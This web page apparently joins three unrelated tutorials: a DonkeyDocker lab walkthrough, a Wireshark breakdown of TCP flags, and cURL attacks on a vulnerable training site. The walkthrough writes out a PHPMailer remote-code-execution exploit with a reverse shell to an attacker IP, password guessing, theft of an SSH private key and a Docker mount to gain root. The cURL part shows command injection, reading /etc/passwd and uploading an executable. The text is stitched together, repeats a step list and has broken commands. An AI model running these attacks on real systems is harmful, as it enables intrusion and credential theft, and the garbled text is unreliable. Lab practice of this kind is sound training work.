Hack the Donkey Docker (CTF Challenge)

Today we are going to solve a fun Vulnerable Lab DonkeyDocker, download this VM Machine from here.

The credit for developing this VM machine is goes to Dennis Herrmann who has hide 3 flag inside this lab as a challenge for hackers.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)

Netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.120

As you can see port 22 for ssh and 80 for http are open, so let’s explore port 80 through Browser.

After browsing I found three tabs Home, About and Contact but didn’t found any clue for next step, then I decided to scan the target directory using dirb scan.

Now open the terminal in kali Linux and type following command:

dirb http://192.168.1.120

From scanning result I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here, we get to know that PHPMailer is running on targeted system. Let try to find out its version.

 So After browsing a bit about PHP Mailer, we came know that how to get the version of phpmailer

http://192.168.1.120/mailer/VERSION

We got the version of PHPMailer i.e. 5.2.16.

From Google we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with back connection (reverse shell) from the target. You can download this exploit from here.

 After Downloading the Python File and make following changes:

1.      Open the file and add “# coding: utf-8” at the beginning.

2.      Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.

3.      Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code

4.      After making above changes save it.After Downloading the Python File and make following changes:

1.      Open the file and add “# coding: utf-8” at the beginning.

2.      Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.

3.      Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code

4.      After making above changes save it.

Now start natcat at port same port on which the payload is bind i.e. 4444 for establishing reverse connection with target.

nc –lvp 4444

Before you run the python script, type following command in a new terminal which will install the exploit dependency.

Pip2 install requests_toolbelt

Now run the script in order to exploit the target as shown in given image.

python 40974.py

Move back natcat shell and here you will find that it is connected to victim but not able to access proper shell of victim system therefore type given command in order to access victim shell properly as shown in image.

python -c 'import pty; pty.spawn("/bin/bash")'




Once you got the victim shell type following commands for finding hidden flag.

Ls

Cat main.sh

Here we found user smith which is a directory has flag.txt let approach toward this directory.

Cd home

Ls

While again opening smith directory, we got Permission denied.

Then we used su smith to instead of sudo, because sudo is not accessible in this shell

Su smith

For Password we tried “smith” and successfully get smith’s shell

Now we are inside smith shell, type following command to get the flag

Ls

Cd /home/smith

Ls

Flag.txt

Cat flag.xt

Grate!! Successfully capture 1^st flag

Moreover if you notice the given image you will find next clue “I like 1984 written by Geoge ORWELL” it could be possible that it might be a user name having 2^nd flag inside it.

Type following command to view all directory list

Ls-al

We got the authorized keys, id_ed25519 and id_ed25519.pub in SSH directory, lets open these key one by one

Cat authorized_keys

Cat id_ed25519

Cat id_ed25519.pub

In id_ed25519 we get the Openssh Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.

We have Save this Private Key in a file as id_rsa as shown in given below image.

Now using ssh login by

Ssh –I id_rsaorwell@192.168.1.120

Here you will be greeted by the Donkey Docker Shell. Now check directory list for 2^nd flag

Ls

Flag.txt

Cat flag.xt

Nice!! Successfully got 2^nd shell

Now for the last flag we tried and a lot of different tricks but nothing seems to get through and you can read an article from here, which help in finding the 3^rd flag.

Type following command

docker run –v /root:/hack –t debian:jessie /bin/sh -c ‘ls -al /hack’

This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.

Now to open this file we will use the previous command just with slight modification as shown:

docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘cat /hack/flag.txt’  

Awesome we got 3^rd flag also.

Analyzing TCP Headers using Wireshark

From given below image you can see we had sniffed the network in order to capture TCP packets, it is clearly showing: time, source IP, destination IP, Protocol, length of packets and information.

As I had told above if you are aware of OSI model then you can see it has shown three layers of OSI: layer 2 (Ethernet), layer 3 (Internet Protocol version 4), layer 4 (Transmission Control Protocol (TCP)).

Now let’s analysis layer 4 and compare above theory with given below image. You can see I have underline all fields of TCP segment. Now read following information of TCP packets.

Source Port: 51574

Destination Port: 80

Sequence number: 0

Acknowledgment number: 0

Flags: SYN

Window size value: 29200

Checksum: unverified

Urgent Pointer: 0

Option: 20 bytes

The SYN (synchronize) flag is the TCP packet flag which is set to start a TCP connection for “3 way handshakes” and  the Sequence number and Acknowledgment number are 0.

From given below image you can see expanded field for flags is showing only 1 flag SYN is set between source port and Destination port rest flags are not set at this moment. Hence the control bits will get 1 for that sets flag in TCP connection otherwise it remains zero.

Packets setting the SYN flag can also be used to perform a SYN flood and a SYN scan.

As I had explain above in three way handshakes first client request with SYN flag after that Server responds to the client request with the SYN and ACK flags set, and from following information we observe same sequence of packet transferring between client and server and as well as the Sequence number is 0 & Acknowledgment number is 1.

Source Port: 80

Destination Port: 51574

Sequence number: 0

Acknowledgment number: 1

Flags: SYN, ACK

Window size value: 42408

Checksum: unverified

Urgent Pointer: 0

Option: 20 bytes

Since server response through SYN-ACK flag therefore port 80 is now source port with SYN-ACK flag to the destination port 51547.

From expanded field of flags you can observe that this time 2 flags SYN and ACK are set rest are remain unset or say zero and control bit is set 1-1 for both flag. This is the 2^nd step for “3 way handshake”.

From following information we found this time the Sequence number & Acknowledgment number are 1 and Client completes the connection by sending a packet with the ACK flag set. Now TCP connection has be established between client and server.

Source Port: 51574

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Option: 12 bytes

For sending ACK packets client again use source port 51547 to the server on destination port 80.

From given below image you can observer that the control bit is 1 for acknowledgement flag  and this is the third step required for “3 way handshake” between source port and destination port.

Once TCP 3 ways handshake connection established then data can transfer between client and server as you can see from last image it has shown 7^th layer for Hypertext Transfer Protocol also for data transferring.

Source Port: 51547

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: PUSH, ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Option: 12bytes

The use of push function and the PUSH flag is to move forward the data from the sending user to the receiving user. In order to permit applications to read from and write to this socket at any time, buffers are implemented on both sides of a TCP connection.

Here you can observe that control bit set to 1 for PUSH and ACK flag as a result a new layer get open for data transferring between sender application and receiver application.

Now when transfer data packet explored we found http header details like:

Host: google.com

User-Agent: Mozilla/5.0

From given image you can observe that the highlighted text is showing connection: keep-alive, which means server is online at present.

In order to terminate the connection with client, the server sends FIN (finish) packets to the client after establishment of TCP 3-way handshake and successful transfer of data.

Source Port: 80

Destination Port: 51547

Sequence number: 1

Acknowledgment number: 1

Flags: FIN, PUSH, ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

From given below image you can you can see this time the control bit is set 1 for ACK, PUSH and FIN flag and acknowledgment number is 709 for this packages.

Hence this will close the connection for data transfer between client and server. From given image you can observe that this time it is showing, connection: close

A RST (reset) packet is launched either in the mid of the 3-way handshake after the server discards the connection or is unavailable OR in the mid of data transfer when either the server or client becomes unavailable or discards further communication lacking the formal 4-way TCP connection termination process.

After this client again try to establish 3–way handshake connection with server.

Source Port: 51547

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: RST

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

In last image you can observe that this control bit is set 1 for RST flag between source port 51547 and destination port 80.

Web Application Penetration Testing with cURL

cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

CURL is simply awesome because of the following reasons...

·         CURL is an easy to use command line tool to send and receive files, and it supports almost all major protocols(DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS,  IMAP, IMAPS,  LDAP,  LDAPS,  POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP) in use.

·         Can be used inside your shell scripts with ease

·         Supports features like pause and resume of downloads

·         It has around 120 command line options for various tasks

·         It runs on all major operating systems(More than 40+ Operating systems)

·         Supports cookies, forms and SSL

·         Both curl command line tool and libcurl library are open source, so they can be used in any of your programs

·         It supports configuration files

·         Multiple upload with a single command

·         Progress bar, rate limiting, and download time details

·         IPV6 Support

CURL comes by default installed in most of the distributions. If you do not have curl tool installed, then it’s a single apt-get (apt-get install curl) or yum (yum install curl) command.

For this tutorial we had used “web for pentester” to support curl command. As you known this lab is vulnerable against many website based attack therefore we had choose curl as our weapon for attack.

Let’s begin!!

Command Injection Exploitation

You must be aware command injection vulnerability which allows to execute OS based arbitrary command, type following command to check directory list in targeted system:

Curl “http://192.168.0.16/commandexec/example1.php?127.0.0.1;ls”

From given below image you can observe that it execute ping command as well as ls command, as result we found three PHP files in this directory.

Download File from URL

Curl is also use for download the data from any website or host machine, following command will download putty.exe file from website.

Curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

HTTP Headers

Curl is use for identify HTTP method which helps in http verb tempering, type following command:

Curl -v -X http://www.google.com

From given below image you can perceive that only GET and HEAD methods are allowed on Google.

File Inclusion

This vulnerability allows an attacker to include a file on the web server, use following curl command to exploit it

Curl http://192.168.0.16/fileincl/example.php?page=etc/passwd

Hence you can observe that we found data from inside etc/passwd

HTTP Authentication

HTTP Authentication is use to inform the server user’s username and password so that it can authenticate that you're allowed to send the request you're sending. Curl is use HTTP Basic authentication. Now type following command which required username and password for login into website through curl.

Curl -data “uname=test&pass=test” http://testphp.vulnweb.com/userinfo.php

If you will notice given below image carefully you can observe that following code contains user information inside the table such as Email-ID, phone number, address and etc.

File Upload

Upload option inside in website allow uploading of any image or text on that particular website, for example uploading any image on facebook.  Use curl command to upload the putty.exe file on targeted system.

Curl -F ‘image=@/root/Desktop/putty.exe’ http://192.168.0.16/upload/example1.php

Great! You can read the highlighted text is indicating towards directory “/upload/images/putty.exe” where file has been successfully uploaded.

Open above given directory in browser as 192.168.0.16/upload/images/

Awesome! From given below you can see putty.exe is uploaded